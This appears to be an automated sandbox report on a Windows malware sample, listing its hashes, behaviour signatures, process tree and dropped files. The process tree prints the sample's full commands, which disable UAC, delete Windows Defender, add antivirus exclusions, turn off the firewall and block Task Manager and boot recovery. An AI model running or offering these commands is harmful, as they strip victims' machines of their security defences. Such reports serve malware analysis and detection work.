Resubmissions

13/07/2024, 09:54

240713-lxcvgawdmn 10

13/07/2024, 09:52

240713-lv46yawdkj 10

13/07/2024, 09:46

240713-lrz3tayajc 10

Analysis

  • max time kernel
    93s
  • max time network
    98s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    13/07/2024, 09:46

General

  • Target

    f244a04265405ae8295551a1324c6dc3162d611b4a152658096d675a31a57d35.exe

  • Size

    3.8MB

  • MD5

    15995b0b1fc5dd82f1c3ba1b7b40c5d4

  • SHA1

    3b6a4a5b8b1107854e35b01cd28b4cce7a003413

  • SHA256

    f244a04265405ae8295551a1324c6dc3162d611b4a152658096d675a31a57d35

  • SHA512

    4ebe82a5d5d499eab10c9049647283976d95f102b24b2113bd59309ea107fb6cf8671640651e7d7cf13435e516c6d2dcbfe3a2fc8a8ed917398b3d86f6a77781

  • SSDEEP

    49152:aApBOr1sU6uEgjhlOCDw8mEFAuYg2OWpTMqBx+fdTmG2Y4MT9ffD+CzKcbmoivTN:

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 11 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 42 IoCs
  • Suspicious use of AdjustPrivilegeToken 22 IoCs
  • Suspicious use of WriteProcessMemory 48 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f244a04265405ae8295551a1324c6dc3162d611b4a152658096d675a31a57d35.exe
    "C:\Users\Admin\AppData\Local\Temp\f244a04265405ae8295551a1324c6dc3162d611b4a152658096d675a31a57d35.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2612
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\prorun.bat"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4604
      • C:\Windows\system32\cacls.exe
        "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
        3⤵
          PID:1284
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide icacls " \System32\smartscreen.exe" /inheritance:r /remove *S-1-5-32-544 *S-1-5-11 *S-1-5-32-545 *S-1-5-18
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1672
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d "0" /f
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4288
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide reg add "HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d "1" /f
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5028
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2448
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableCMD" /t REG_DWORD /d "1" /f
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2700
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d "1" /f
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5088
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d "1" /f
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3828
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide sc stop windefend
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:628
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide sc delete windefend
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1704
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide bcdedit /set {default} recoveryenabled No
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2884
        • C:\Users\Admin\AppData\Local\Temp\NSudo.exe
          NSudo -U:T -ShowWindowMode:Hide bcdedit /set {default} bootstatuspolicy ignoreallfailures
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4960
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -inputformat none -outputformat none -NonInteractive -Command "Add - MpPreference - ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2052
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
          3⤵
          • UAC bypass
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5020
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set - MpPreference - EnableControlledFolderAccess Disabled"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4892
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set - MpPreference - PUAProtection disable"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3960
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set - MpPreference - HighThreatDefaultAction 6 - Force"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3436
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set - MpPreference - ModerateThreatDefaultAction 6"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3888
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set - MpPreference - LowThreatDefaultAction 6"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3976
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set - MpPreference - SevereThreatDefaultAction 6"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4272
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Set - MpPreference - ScanScheduleDay 8"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4928
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "netsh advfirewall set allprofiles state off"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4304
          • C:\Windows\system32\netsh.exe
            "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
            4⤵
            • Modifies Windows Firewall
            • Event Triggered Execution: Netsh Helper DLL
            PID:1784

    Network

          MITRE ATT&CK Enterprise v15

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

            Filesize

            2KB

            MD5

            d85ba6ff808d9e5444a4b369f5bc2730

            SHA1

            31aa9d96590fff6981b315e0b391b575e4c0804a

            SHA256

            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

            SHA512

            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            149d8ea75129b5bac13935c6f7ee2b40

            SHA1

            ec14c55a848e3dd28e474e8a67276589022ee5fa

            SHA256

            e4a07720c6d373c2e2e13ca98e4ccc169d6bf4fa15df35fef9a4d69185e023bd

            SHA512

            fb65b85dc3f4341dbf6640355c25238f31fade0547fc6214f7c83d70f6d98f05fa43a6fe7c1ec9e9454a463d482eb77efca0dbccc157baabd15bf89c865e27bc

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            e5bfec1063a497048fffb231a0621403

            SHA1

            97cf6a89f237f43b9c22e3e081f7d45924d435ba

            SHA256

            325d1ffa65e9593a834f3662168d0c1950de148c63f1e43b86727087f3881d6f

            SHA512

            e38c5189054cf09fb15de017d0bbe226338124ee02bb04530943c8fcfc303dbe5fe5fd28c9c1aea1b552d1a2b0b76cabbedd284a38a07d41ec9cf9e55b44dd0e

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            58b97594c4d764d5d99a459fbee0fd33

            SHA1

            4d1f8f4f5bbf87a6ea3ae7b7be623542377365da

            SHA256

            8001b17515105615ae767a048f98b1c1d211130f7c8c7e9bb585cf063b0c6db2

            SHA512

            874c700052930cfc7bc99e3e0353bf3a3891e45854df7982f73a2fa4d8a60546d683fae0163104e047991955d7d6b8950447be83a93d99ae9d9931a1e13e3cf7

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            e89c193840c8fb53fc3de104b1c4b092

            SHA1

            8b41b6a392780e48cc33e673cf4412080c42981e

            SHA256

            920b0533da0c372d9d48d36e09d752c369aec8f67c334e98940909bfcb6c0e6c

            SHA512

            865667a22e741c738c62582f0f06ea4559bb63a1f0410065c6fb3da80667582697aba2e233e91068c02d9ab4fb5db282a681fe8234f4c77a5309b689a37ac3a2

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            64B

            MD5

            5caad758326454b5788ec35315c4c304

            SHA1

            3aef8dba8042662a7fcf97e51047dc636b4d4724

            SHA256

            83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

            SHA512

            4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            38f0f14cc7ca72ad51216866e66efb4e

            SHA1

            34ed0f47a4aaa95e786ca9f125b0341b38bfb9be

            SHA256

            668820fc659c9d229d32731ead41381eca0e5fb57232bbd3ef0118f5a21fc501

            SHA512

            4a7d00c585784cf1aec6ed82d8c78542d2db3b9da30d8db20680a1ee9fd45b697207fbd459557336f2166d8b6ac17016f9e71c61ad351f2915bb163c8ed2b73a

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            ef5ef35c3059825861b16409862d0e3d

            SHA1

            cde5311765478b1bcf309219c1a86a0238612099

            SHA256

            53df4a6c07213c72fa9c8f1e6c20d5a771d587744f775b4d45b647c1f890cc4b

            SHA512

            3c5814f9f94f4127f175b79e9d95eb7426c67b2d593ef6880c62cc3541d36142b9cb7391e3eac58fe45991d4e5fa7f979c96cba91da2354b7f56d8a2bb76dd20

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            b9c2e6782fd47c983dc61478147f7176

            SHA1

            ebaf50c810dbeca3846867c685d77ae4c871f253

            SHA256

            010430a83f5f1bbd71687b20e9055bbdf643c4c4c5d2b9a5d18098a751750a0b

            SHA512

            bbca313407db73166df19c9a6e5c0ddd520f316dd7ddc0160b2a0cb31139e45aef6f2cff667a3025df56f2bb5e36a4b25dab39a16ff9f914857588d4e3e19834

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            5ed3bd9bc72e312aadc7571ad8786379

            SHA1

            c6cc90bf1250e7ec5cd7680a9689940cec6398da

            SHA256

            8c54d4148a9e2a3b524f471f99aa3d48778239ae494908b544ef8f014d7d0eee

            SHA512

            d020f76b71142f58c990f62354c568d9cee901a2e808d11d4e6d439aa3ffc36f070d613e3bd9522aaa1d44d3288c91c89fcf911600fdad9e96d3900c12941c47

          • C:\Users\Admin\AppData\Local\Temp\NSudo.exe

            Filesize

            247KB

            MD5

            5cae01aea8ed390ce9bec17b6c1237e4

            SHA1

            3a80a49efaac5d839400e4fb8f803243fb39a513

            SHA256

            19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618

            SHA512

            c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rq2vo3nv.fj1.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Users\Admin\AppData\Local\Temp\prorun.bat

            Filesize

            2KB

            MD5

            0f887625226181fb0136e6145919e56a

            SHA1

            1477b214aafcf9a518f7a13832da00d639f22943

            SHA256

            8706ff21236560835dff325f9ed3f32a96c3964806b04b49fff9b20e1df856d8

            SHA512

            81a68c2addd5bfd9a913f70352dafd643013f61ec42b3e9943caffc6f7e80a9521f70e69c13e9ab1c170cbdb4f1d2920384cacb3cbebab58d5dbb61574f44b7b

          • memory/2052-29-0x00000260F5730000-0x00000260F5752000-memory.dmp

            Filesize

            136KB

          • memory/2612-0-0x00007FFB17383000-0x00007FFB17385000-memory.dmp

            Filesize

            8KB

          • memory/2612-14-0x00007FFB17383000-0x00007FFB17385000-memory.dmp

            Filesize

            8KB

          • memory/2612-1-0x0000023B60B20000-0x0000023B60EF6000-memory.dmp

            Filesize

            3.8MB

          • memory/2612-141-0x0000023B62D30000-0x0000023B62D50000-memory.dmp

            Filesize

            128KB

          • memory/2612-142-0x0000023B7B5C0000-0x0000023B7B5CA000-memory.dmp

            Filesize

            40KB

          • memory/2612-143-0x0000023B7B8B0000-0x0000023B7BA1A000-memory.dmp

            Filesize

            1.4MB